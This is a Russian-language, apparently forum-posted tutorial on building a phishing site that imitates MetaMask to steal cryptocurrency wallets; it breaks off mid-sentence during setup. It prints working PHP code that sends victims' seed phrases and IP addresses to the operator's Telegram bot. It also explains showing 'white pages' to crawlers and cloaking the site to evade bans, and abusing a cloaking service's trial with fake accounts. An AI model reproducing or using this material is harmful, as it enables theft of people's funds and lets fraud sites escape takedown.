Создаем фишинговый сайт MetaMask и зарабатываем на нем.

[D2]

Статья создана для людей, не имеющих опыта в этой сфере, но имеющих желание попробовать себя в этой области. Хотя стоит уточнить, что сейчас фишинг на мнемоническую фразу идет совсем не так хорошо, как еще пол года назад. Итак, начнем.

Что и за чем нужно делать ?

1. Создаем страницу (HTML, CSS, JS)

2. Настраиваем логирование в телеграм

3. Разбираемся с белой страницей и офером

4. Настраиваем хостинг

5. Настраиваем клоаку

6. Выжимаем максимум из логов


Перечень ресурсов и сервисов которые мы будем использовать.

Бот для получения вашего ID в телеграме - @username_to_id_bot

Сервис для клоакинга – Cloaking House

Хостинг - Namecheap

Браузерный кошелек - Metamask

Бот для анализа активов на кошельке – Crypto Finder



1. Создаем страницу (HTML, CSS, JS)

Для создания страницы, вам понадобятся базовые навыки работы с разметкой и стилями. В качестве примера можете использовать приложенный проект.
Для отправки логов в телеграм в этом проекте используется jquery и php.

Файлы проекта:



Обфусцированный js код в конце html разметки отвечает за анимированную голову лисицы.

Для работы с этим проектом я использовал Open Server Panel. Вы можете использовать любой другой локальный веб-сервер. Если вы откроете offer.html напрямую, страница не будет корректно отображаться.

Старайтесь избегать ссылок на официальный сайт METAMASK, когда верстаете страницу.

2. Настраиваем логирование в телеграм

В директории проекта есть файл test.php.

Тут находится код для отправки нам мнемонической фразы и ip адреса пользователя.

После попадания на главную страницу пользователь вводит мнемоническую фразу , после чего она отправляется к нам в телеграм.



PHP: Скопировать в буфер обмена

<?php

ini_set('display_errors', 0);

error_reporting(0);

$message=$_GET['message'];

$remoteIp=$_SERVER['REMOTE_ADDR'];

$botToken= 'токен вашего телеграм бота';

$chatId='ваш id в телеграм(как пользователя)';

$telegramApiUrl="https://api.telegram.org/bot{$botToken}/sendMessage";

$messageData=[

'chat_id'=>$chatId,

'text'=>"<code>$remoteIp</code>\n\n<code>$message</code>",

'parse_mode'=>'html',];

$httpOptions = [

'http' => [

'header' => 'Content-Type: application/x-www-form-urlencoded',

'method' => 'POST',

'content' => http_build_query($messageData),

],

];

$httpContext=stream_context_create($httpOptions);

$response=file_get_contents($telegramApiUrl,false,$httpContext);

if($response===false){

echo 'Failed to send the message.';

}

else{

echo 'Message sent successfully.';

}

?>

Обратите внимание, что вам нужно подставить свои значения в переменные $botToken и $chatId. Для этого зараннее создаем телеграм бота для получения логов. Воспользуемся ботом @BotFather. Если вы знакомы с процесом создания ботов в телеграме, можете пропустить третий пункт инструкции.

Следуем такому алгоритму.

Дальше выбираем название и придумываем уникальное имя для вашего бота.

Название и уникальное имя необходимо придумать самому. Для подключения бота в нашем php файле вам нужен токен. На представленной выше картинке он выглядит так: 6490359840:AAENlFYai11AKkbGUe9FAEVDHniH_erzV-o. Вам нужно скопировать свой токен, и присвоить переменной $botToken значение в виде строки, таким образом:

Дальше переходим в переписку с ботом и нажимаем “ЗАПУСТИТЬ”

​

Следующим шагом, нам необходимо получить свой id пользователя. Для этого воспользуемся телергам ботом @username_to_id_bot. Вам необходимо запустить бота и он выдаст вам ваш id. Он будет иметь вид числа в таком формате - 5725159211. Помещаем его в переменную $chatId:

3. Разбираемся с офером и белой страницей

Если вам не знакомы эти понятия, то вам пора о них узнать. Офер - это, непосредственно, наша страница, на которой пользователь имеет удовольствие вводить свою мнемоническую фразу. Белая страница - это страница, на которую попадают боты-краулеры, когда попадают на наш сайт. Давайте создадим белую страницу. Для этого подойдет любой сайт, связанный с вашей тематикой (напр: криптовалюта, блокчейн) либо с доменным именем вашего сайта. Белая страница должна быть страницей чисто информативного характера. Пример такой страницы лежит в директории прикрепленного выше проекта с названием white.html.

Важно учесть, что белую страницу нужно периодически менять, поэтому лучше сверстать ее самому. В крайнем случае заказать. Ничего сложного тут нет, поэтому стоить это будет недорого.


4. Настраиваем клоаку

Если у вас есть опыт работы с клоакингом, можете пропускать этот пункт. Для всех остальных могу предложить сервис https://cloaking.house/. Его настройка проходит легко и понятно. Кроме того Cloaking House имеет бесплатный тестовый период, который длится 10 дней. После этого вы можете создать новый аккаунт и снова начать пробный период. Мультиаккаунт никак не пресекается сервисом. При регистрации вы можете указывать несуществующий телеграм аккаунт и электронную почту, подлинность аккаунтов проверятся не будет.

После прохождения регистрации на сайте https://cloaking.house/, мы попадаем в кабинет.


Нажимаем большую синюю кнопку «Создать поток».

Далее, вводим произвольное название потока (на картинке внизу это - test). В поле White Page пишем название файла белой страницы (на картинке внизу это – white.html) , в поле Offer Page название нашей главной страницы (на картинке внизу это –offer.html) и нажимаем кнопку «Продолжить».

На следующей странице ( картинка внизу) активируем пункты “Cloaking” и “Запретить переходы без ISP”. Переходы с vpn не запрещаем, потому что таким образом потеряем людей с включенным vpn.

IPv6 – новая версия интернет протокола, уже используется многими смартфонами, так что пользователей с IPv6 исключать с помощью фильтров не будем. Регуляция переходов без referrer работает на этом сервисе не очень корректно, поэтому этот пункт оставляем неактивным.

Исключать с помощью фильтра мы будем пользователей, которые сделали больше 5 кликов по нашей ссылке в сутки. В основном, так ведут себя только боты, которые ускоряют бан вашего сайта.

Выбираем все страны, устройства, операционные системы и браузеры. В поле “черный список” вы можете выбрать созданный раннее черный список. Создать его можно в главном меню. Вносить туда стоит ip-адреса, которые показались вам подозрительными. Рассматривать функцию "черный список" подробно мы в этой статье не будем.

​

Переходим на следующую страницу. Тут необходимо включить настроенный только что клоакинг. В поле “Белый список” вы можете внести ip, к которым не будут применены наши фильтры. Сюда вы, например, можете внести ваш ip.

Настройка закончена. Вас автоматически переместит на главную страницу, где вам нужно Скачать